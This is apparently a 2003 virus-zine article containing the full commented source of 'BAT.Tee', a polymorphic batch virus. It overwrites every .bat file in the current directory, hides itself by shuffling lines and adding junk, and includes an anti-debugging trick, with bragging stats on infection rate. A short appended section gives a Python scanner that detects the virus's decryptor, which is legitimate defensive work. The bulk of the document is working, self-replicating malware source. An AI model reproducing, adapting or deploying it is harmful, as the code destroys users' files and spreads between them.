Redemption

Strange Article - BAT.Tee by Toro

rRlf proudly presents: The winner of our Countertest!

::   ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ  ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
::  ßßßÛÛÛÛÛÛ ÜÜ ßßß  ßßß ÜÜÜ ÛÛÛÛÛÛßßß
::      ±ÛÛÛÛ ÛÛÛÛÛÛ   ÛÛÛÛÛÛ ÛÛÛÛ°
::       ÛÛÛÛ ÛÛÛÛÛÛ  ²ÛÛÛÛÛ  ÛÛÛÛ
::       ÛÛÛÛ ßÛÛÛÛ± ÜÛÛÛÛ²   ÛÛÛÛ
::      °ÛÛÛÛ  ÛÛÛÛÛßÛÛÛÛß    ÛÛÛÛ
::      ±ÛÛÛÛ  ÛÛÛÛ²  ÛÛÜÜ    ÛÛÛÛ°
::   ÜÜ ²ÛÛÛÛ  ÛÛÛÛ±  ÛÛÛÛ²Ü  ÛÛÛÛ± ÜÜÜ
::  Û   ÛÛÛÛÛ  ÛÛÛÛ²  ²ÛÛÛÛÛ° ÛÛÛÛ²    Û
::  Û   ÛÛÛÛÛ ÜÛÛÛÛÛ   ²ÛÛÛÛ² ÛÛÛÛÛ    Û
::  ßÜ  ßßßßß ßßßß       ßßßß ßßßßß   Üß
::  ÜßßßßßßþThe Knight TemplarsþßßßßßßÜ
::  Û                                 Û
::  Û         Tee by Toro/TKT         Û
::  Û                                 Û
::  Û                                 Û
::   ßÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜß


:: BAT.Tee, coded by Toro/TKT in 2003 for the rRlf contest (deadline 23.05.2003)

:: Features:
::  - size: 5632 bytes only
::  - encryption by placing the lines of code in random order
::  - polymorphic, with junk instructions
::  - anti-tracing trick
::  - infects all files in the current directory
::  - overwrites the new host
::  - target platforms: MS-DOS on Win9x, Win2k and WinXP
::  - commented source

:: Stats:
::  - estimate for the average infection rate: 9.93 min/file on a PII 400 MHz, 128 MB RAM
::  - 95% likely that the average infection rate lies in the interval <9.64 , 10.21>
::  - estimate for the average file size: 7681 bytes
::  - 95% likely that the average file size lies in the interval <7589 , 7773>
::  - the size appears to change with the OS - up to 16 KB spotted on Win2k,
::    though the stats presented here are for Win98 only

:: Compilation notes:
::    Use the BatchPatch program, which is not included here. The marker on the
::    last line of code must be removed manually after running BatchPatch.

:: Additional notes:
::    The polyengine is a light version of an existing polyengine I wrote quite
::    a while back. The same goes for the encryption engine, which dates from
::    the year 2000. This was done in order to optimize for size. My major
::    problem was to get this virus below or equal to 5.5 KB. I solved this in
::    several ways, for instance by moving code into environment variables and
::    shortening labels and variable names. Due to this limit, the junk quality
::    is rather poor. Wonder why the marker is one character only? Make a guess,
::    and I'll tell you how I saved 564 bytes.

:: Thanks go out to...
::    CWarrior - for ideas and a good laugh
::    philet0ast3r - nice contest!

:: Toro, end of April, 2003.



@echo off
rem Tee by Toro/TKT
if not %1!==! goto %1

:: find ourselves
set h=%0
if not exist %0 set h=%0.bat

:: find 'find.exe'
:: call %h% ff label directory filename variable
for %%a in (%path%) do call %h% ff %%a find.exe find

:: find 'command.com' for compatibility issues
for %%a in (%path%) do call %h% ff %%a command.com cs

:: setup optimization variables
set cx=%cs% /e:32768 /f /c 

:: allocate memory and enable error-trapping
%cx%%h% s
@goto end

:ff 
for %%a in (%2%3 %2\%3) do if exist %%a set %4=%%a
goto end

:s 
:: setup optimization variables
set ax=for %%a in (0 1 2 3 4 5 6 7 8 9) do 
set bx=f o r $0 %%%%%%%% A $0 i n $0 $1 0 $0 1 $0 2 $0 3 $0 4 $0 5 $0
set dx=6 $0 7 $0 8 $0 9 $2 $0 d o $0 c a l l  $0 %%%%%% 1 0 $0 
set t=%temp%

:: set up necessary variables
set o=%t%\o
set t1=%t%\a.bat
set t2=%t%\b
set j=at

for %%a in (*.b%j%) do call %h% inf %%a
goto end

:inf 
truename %2 | %find% /i "%h%">g
if not errorlevel 1 goto end

:: make polyheader, encrypt the body and infect the damned file
rem>%o%
%cx%%h% p
%cx%%h% enc
echo :end>>%o%
type %o%>%2
goto end

:: Optimization variables:
:: ax: for %%a in (0 1 2 3 4 5 6 7 8 9) do 
:: bx: f o r $0 %%%%%%%% A $0 i n $0 $1 0 $0 1 $0 2 $0 3 $0 4 $0 5 $0 6 $0 7 $0 8 $0 9 $2 $0 $0 d o $0 c a l l  $0 %%%%%% 1 0 $0 a $0 
:: cx: %comspec% /e:32768 /f /c 
:: dx: 


:: counter code
:: goto c3 for 000->999,
::      c2 for  00->99,
::      c1 for   0->9
:c3 
%ax%call %h% c2 %%a
goto end

:c2 
%ax%call %h% c1 %2%%a %2 %%a
goto end

:c1 
%ax%call %h% %label% %2%%a %3 %4 %%a
goto end


:enc 
:: create variable-tree of existing lines of code
set label=mem
call %h% c3

:: place these lines in random order
:grp 
:: quit if out of groups
if %grps%!==! goto end

:: get random group
call %h% rnd
set grp=%rnd%
set f=
for %%a in (%grps%) do if %grp%!==%%a! set f=1
if %f%!==! goto grp

:sec 
:: check if this group is empty
set f=
echo if %%sec%grp%%%!==! set f=1>%t1%
call %t1%
if %f%!==1! goto rgrp

:: get random section
call %h% rnd
set sec=%rnd%
set f=
echo for %%%%a in (%%sec%grp%%%) do if %%%%a!==%sec%! set f=1>%t1%
call %t1%
if %f%!==! goto sec

:ln 
:: check if this section is empty
echo if %%ln%grp%%sec%%%!==! set f=0>%t1%
call %t1%
if %f%!==0! goto rsec

:: get random line
call %h% rnd
set ln=%rnd%
set f=
echo for %%%%a in (%%ln%grp%%sec%%%) do if %%%%a!==%ln%! set f=1>%t1%
call %t1%
if %f%!==! goto ln

:: add line to outputfile
%find% "T%grp%%sec%%ln%" <%h% >>%o%

:: add junk
:: call %h% junk

:: remove line from tree
set f=
echo for %%%%a in (%%ln%grp%%sec%%%) do if not %%%%a!==%ln%! call %h% addf %%%%a>%t1%
echo set ln%grp%%sec%=%%f%%>>%t1%
call %t1%
goto grp

:rgrp 
:: remove group from tree
set f=
for %%a in (%grps%) do if not %%a!==%grp%! set f=%f% %%a
set grps=%f%
goto grp

:rsec 
:: remove section from tree
set f=
echo for %%%%a in (%%sec%grp%%%) do if not %%%%a!==%sec%! call %h% addf %%%%a>%t1%
echo set sec%grp%=%%f%%>>%t1%
call %t1%
goto sec

:addf 
set f=%f% %2
goto end

:mem 
:: input: %2 = grp|sec|ln, %3 = grp, %4 = sec, %5 = ln
:: create a variabletree of groups, sections and lines
:: [grp][sec][ln]
%find% "T%2" <%h% >g
if errorlevel 1 goto end
echo set ln%3%4=%%ln%3%4%% %5>%t1%
if not %ogrp%!==%3! set grps=%grps% %3
if not %ogrp%!==%3! set ogrp=%3
if not %osec%!==%4! echo set sec%3=%%sec%3%% %4>>%t1%
if not %osec%!==%4! set osec=%4
call %t1%
goto end


:: poly code
:p 
:: a smart way to do a count
set label=pline

:: anti-debugging
echo a|call
goto c2

:pline 
:: get polylayer-data into a variable
%find% /i "poly%2" <%h% >%t1%
if errorlevel 1 goto end
set code2=
call %t1%

set pcode=

:: process polydata
for %%a in (%code%) do call %h% proc %%a
for %%a in (%code2%) do call %h% proc %%a

:: write polycode to file
call %h% wrt

:: add junk
:junk 
set pcode=
call %h% rnd
%find% /i "junk%rnd%" <%h% >%t1%
call %t1%

:: process junk
for %%a in (%code%) do call %h% proc %%a

:: write junk
call %h% rnd
call %h% wrt

:: add more junk?
call %h% rnd
for %%a in (0 1 2 3 4 5 6 7 8) do if %%a==%rnd% goto junk
goto end

:wrt 
:: write contents of pcode to outputfile
echo prompt %pcode%$_>%t1%
%cx%%t1%>%t2%
%find% " " <%t2% | %find% /v "$">>%o%
goto end

:proc 
:: special encoding for space, (, ), " and /
for %%a in (0 1 2 3 4) do if %2!==$%%a! goto p%%a

:: PATH can be used for many things - making characters uppercase is one of them
set opa=%path%
path=%2
set f=%2

:: get a random number
call %h% rnd

:: 50/50 upper- vs lowercase
for %%a in (0 1 2 3 4) do if %%a==%rnd% set f=%path%
set pcode=%pcode%%f%
set path=%opa%
goto end

:p0 
set pcode=%pcode% 
goto end

:p1 
set pcode=%pcode%(
goto end

:p2 
set pcode=%pcode%)
goto end

:p3 
set pcode=%pcode%"
goto end

:p4 
set pcode=%pcode%/
goto end

:rnd 
:: Description : returns a random number
:: Input       : none
:: Output      : rnd = random number (0-9)
:: Notes       : original code by Tom Lavedas, modified to suit my needs.

echo @prompt echo %h% calcrnd $t $t$h $g %t%\~rnd.bat$_exit$_>%t%\~rnd.bat
%cx%%t%\~rnd.bat | %cs% >nul
%t%\~rnd.bat

:calcrnd 
%ax%if %2!==%3%%a! set rnd=%%a
%ax%if %3!==%5%%a! set rnd=%%a
goto end


:: junk-table
set code=c d $0 $g g %junk0%%junk5%%junk2%
set code=e c h o $0 a %%rnd%% $g g %junk1%%junk6%
set code=r e m $0 %junk3%%junk8%%junk7%
set code=s e t $g g $0 %junk4%%junk9%


:: polylayer
set code=@ e c h o $0 o f f%poly00%
set code=i f $0 n o t $0 %%%%%% 1 1 ! $q $q ! $0 g o t o $0 %%%%%% 1 1%poly01%
set code=s e t $0 h $q %%%%%% 1 0%poly02%
set code=i f $0 n o t $0 e x i s t $0 %%%%%% 1 0 $0 s e t $0 h $q %%%%%% 1 0.b a t%poly03%
set code=e c h o $0 @ $g ~b .b a t%poly04%
set code=%bx%%poly05%
set code2=%dx%a $0 %%%%%%%% A%poly05%
set code=e c h o $0 :e n d $g $g ~b. b a t%poly06%
set code=~b .b a t $0%poly07%
set code=: a $0 %poly08%
set code=%bx%%poly09%
set code2=%dx%b $0 %%%%%% 1 2 %%%%%%%% A%poly09%
set code=g o t o $0 e n d%poly10%
set code=: b $0 %poly11%
set code=%bx%%poly12%
set code2=%dx%c $0 %%%%%% 1 2 %%%%%%%% A%poly12%
set code=g o t o $0 e n d%poly13%
set code=: c $0 %poly14%
set code=f i n d $0 $4 i $0 $3 t %%%%%% 1 2 $3 $0 $l %%%%%% 1 h %%%%%% 1 $0 $g $g ~b .b a t%poly15%
set code=g o t o $0 e n d%poly16%


:end
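An added detection example, not part of Toro's source or the zine: a small Python scanner that undoes the only variation the poly layer above introduces (random per-character case via the PATH trick, plus interleaved junk lines) and then looks for the invariant parts of the emitted decryptor taken from the polylayer table: the `echo @>~b.bat` dropper, the three digit-counter `for` loops and the `find /i "t%2"` line extractor. The infected header below is hand-constructed from that table, not a real sample.

```python
import re

# Constructed illustration of the header the poly layer above emits
# (random per-character case, junk lines interleaved); NOT a real sample.
SAMPLE_INFECTED = """@EcHo oFf
If nOt %1!==! gOtO %1
sEt h=%0
rEm a7
iF NoT eXiSt %0 SeT h=%0.bat
ECHO @>~b.BAT
fOr %A iN (0 1 2 3 4 5 6 7 8 9) Do CaLl %0 a %A
eCho :eNd>>~B.bat
~b.BaT
:a
cD >g
FoR %A In (0 1 2 3 4 5 6 7 8 9) dO cAlL %0 b %2%A
gOtO eNd
:b
fOR %A in (0 1 2 3 4 5 6 7 8 9) DO CALL %0 c %2%A
GoTo EnD
:c
FiNd /I "T%2" <%H% >>~b.bAt
gOtO eNd
"""
SAMPLE_CLEAN = "@echo off\nfor %%a in (*.txt) do type %%a\n"

# Invariant fragments of the decryptor, matched after normalization.
INDICATORS = {
    "temp_dropper": re.compile(r"echo @>~b\.bat"),
    "digit_counter_loop": re.compile(
        r"for %a in \(0 1 2 3 4 5 6 7 8 9\) do call %0 [abc] "),
    "line_extractor": re.compile(r'find /i "t%2" <%h% >>~b\.bat'),
}

def normalize(text):
    """Fold case and collapse blanks: the engine only varies case, so this
    undoes the polymorphic layer; junk lines simply never match."""
    return "\n".join(" ".join(ln.split()) for ln in text.lower().splitlines())

def scan(text):
    """Return how often each indicator occurs in the normalized text."""
    norm = normalize(text)
    return {name: len(pat.findall(norm)) for name, pat in INDICATORS.items()}

def is_tee_decryptor(text):
    """Flag only when the dropper, all three counter loops and the extractor
    are present, so an ordinary batch file with one loop is not reported."""
    h = scan(text)
    return (h["temp_dropper"] >= 1 and h["digit_counter_loop"] >= 3
            and h["line_extractor"] >= 1)
```

The encrypted body that follows the header is not matched at all; the three-part decryptor is enough to flag a file for quarantine and manual review.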
